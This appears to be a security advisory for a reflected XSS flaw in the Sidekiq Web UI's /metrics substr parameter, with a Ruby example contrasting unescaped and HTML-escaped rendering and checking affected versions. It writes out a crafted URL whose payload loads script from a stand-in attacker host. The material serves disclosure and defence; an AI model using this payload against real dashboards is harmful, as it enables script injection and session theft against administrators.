GEM
SEVERITY
CVSS v3.x: 5.5 (Medium)
UNAFFECTED VERSIONS
- < 7.2.0
PATCHED VERSIONS
- >= 7.2.4
DESCRIPTION
Reflected XSS in the Sidekiq Web UI via the /metrics HTTP endpoint and its substr query parameter. The parameter value is reflected into the page, so a crafted URL of the following form injects an attacker-supplied script:
https://{host}/sidekiq/metrics?substr=foot%22%3E%3Cscript%20src=%22{payload}%22%20/%3E
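The following is an added example and not Sidekiq's own code: it decodes the substr value from a URL built on the pattern above, contrasts an unescaped interpolation into a quoted attribute (an assumed reflection point, chosen for illustration, not Sidekiq's actual template) with the HTML-escaped form, and checks a version string against the affected range implied by the UNAFFECTED and PATCHED fields. The host and the script source are constructed placeholders standing in for {host} and {payload}.

```ruby
require "erb"
require "uri"

# Constructed URL following the advisory's pattern; the host and the script
# source stand in for the {host} and {payload} placeholders (assumed values).
ATTACK_URL = "https://sidekiq.example.test/sidekiq/metrics" \
             "?substr=foot%22%3E%3Cscript%20src=%22https://attacker.example/x.js%22%20/%3E"

# Extract the decoded substr parameter the way a Rack app would see it.
def substr_param(url)
  query = URI.parse(url).query.to_s
  URI.decode_www_form(query).to_h["substr"]
end

# Assumed reflection point (for illustration, not Sidekiq's template): the
# parameter is interpolated straight into a quoted attribute. A value that
# contains `">` terminates the attribute and the tag, and what follows is
# parsed as new markup.
def render_unsafe(substr)
  %(<input type="text" name="substr" value="#{substr}">)
end

# Hardened form: HTML-escape before interpolation. ERB::Util.html_escape turns
# & < > " ' into entities, so the value stays inside the quoted attribute.
def render_escaped(substr)
  %(<input type="text" name="substr" value="#{ERB::Util.html_escape(substr)}">)
end

# Did the rendered markup gain a script element the template never contained?
def injected_script?(html)
  html.match?(/<script\b/i)
end

# Version check against the page's ranges: < 7.2.0 unaffected, >= 7.2.4 patched.
def affected_version?(version)
  v = Gem::Version.new(version)
  v >= Gem::Version.new("7.2.0") && v < Gem::Version.new("7.2.4")
end

if __FILE__ == $PROGRAM_NAME
  value = substr_param(ATTACK_URL)
  puts "decoded substr: #{value}"
  puts "unsafe render injects <script>: #{injected_script?(render_unsafe(value))}"
  puts "escaped render injects <script>: #{injected_script?(render_escaped(value))}"
  puts "escaped markup: #{render_escaped(value)}"
  %w[7.1.6 7.2.0 7.2.3 7.2.4].each do |ver|
    puts "sidekiq #{ver} affected? #{affected_version?(ver)}"
  end
end
```

The fix pattern is the general one for reflected parameters in server-rendered HTML: escape at the point of interpolation into the template, not by filtering the input, since the same value may need to be both searchable and displayable.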